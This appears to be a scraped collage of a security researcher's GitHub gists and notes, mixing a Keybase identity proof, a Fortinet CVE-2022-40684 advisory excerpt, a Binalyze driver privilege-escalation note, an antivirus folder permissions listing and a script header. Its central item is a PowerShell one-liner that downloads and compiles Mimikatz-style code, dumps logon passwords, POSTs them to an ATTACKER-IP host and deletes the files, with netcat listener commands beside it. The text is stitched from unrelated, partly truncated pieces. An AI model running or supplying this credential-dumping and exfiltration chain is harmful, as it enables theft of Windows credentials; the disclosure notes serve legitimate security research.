I hereby claim:
- I am tylerdru1d on github.
- I am dru1d (https://keybase.io/dru1d) on keybase.
- I have a public key whose fingerprint is 16BE 864F AB13 1A3F BAB7 9D68 0A45 A12E 5B78 5293
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
Credits: https://github.com/caseysmithrc and https://github.com/xillwillx | |
#On attacker machine: | |
#nc -lkvp 80 >> katz-listener.log | |
#SSL encrypted traffic | |
#ncat -lkvp 443 --ssl | |
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://gist.githubusercontent.com/dru1d-foofus/aa8c6894c2be84bb01b1ddeba492134e/raw/a8e703dcb7af9ea02309c71292931670c2ec63f7/katz.cs','katz.cs'); && c:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe katz.cs && c:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe privilege::debug sekurlsa::logonpasswords > katz.txt exit && powershell -ExecutionPolicy Bypass -noLogo -Command (Invoke-WebRequest -Uri http://ATTACKER-IP/$env:ComputerName -Method POST -InFile katz.txt -TimeoutSec 5); exit && del katz.* && exit | |
#SSL - encrypted traffic | |
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebCl |
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\.sentry-native | |
Owner : BUILTIN\Administrators | |
Group : DESKTOP-8B89BFF\None | |
Access : BUILTIN\Users Allow Modify, Synchronize | |
NT SERVICE\TrustedInstaller Allow FullControl | |
NT SERVICE\TrustedInstaller Allow 268435456 | |
NT AUTHORITY\SYSTEM Allow FullControl | |
NT AUTHORITY\SYSTEM Allow 268435456 | |
BUILTIN\Administrators Allow FullControl | |
BUILTIN\Administrators Allow 268435456 |
Summary An authentication bypass using an alternate path or channel vulnerability [CWE-288] in FortiOS, FortiProxy and FortiSwitchManager may allow an unauthenticated atttacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.
Exploitation Status: Fortinet is aware of an instance where this vulnerability was exploited, and recommends immediately validating your systems against the following indicator of compromise in the device's logs: user="Local_Process_Access" Source: https://www.fortiguard.com/psirt/FG-IR-22-377; https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/
A FortiOS 7.0.6 virtual appliance VM was acquired from the Fortinet portal. This was subsequently deployed into a lab environment where further testing would take place.
Mike Alfaro (@_mmpte_software) and Tyler Booth (@tyler_dru1d)
An issue in Binalyze IREC.sys v.3.11.0 and before allows a local attacker to execute arbitrary code and escalate privileges due to an improper DACL being applied to the device the driver creates.
Incorrect Acess Control
#! /usr/bin/env python3 | |
####################### | |
# Certipy JSON Parser # | |
# dru1d # | |
####################### | |
import json | |
import argparse |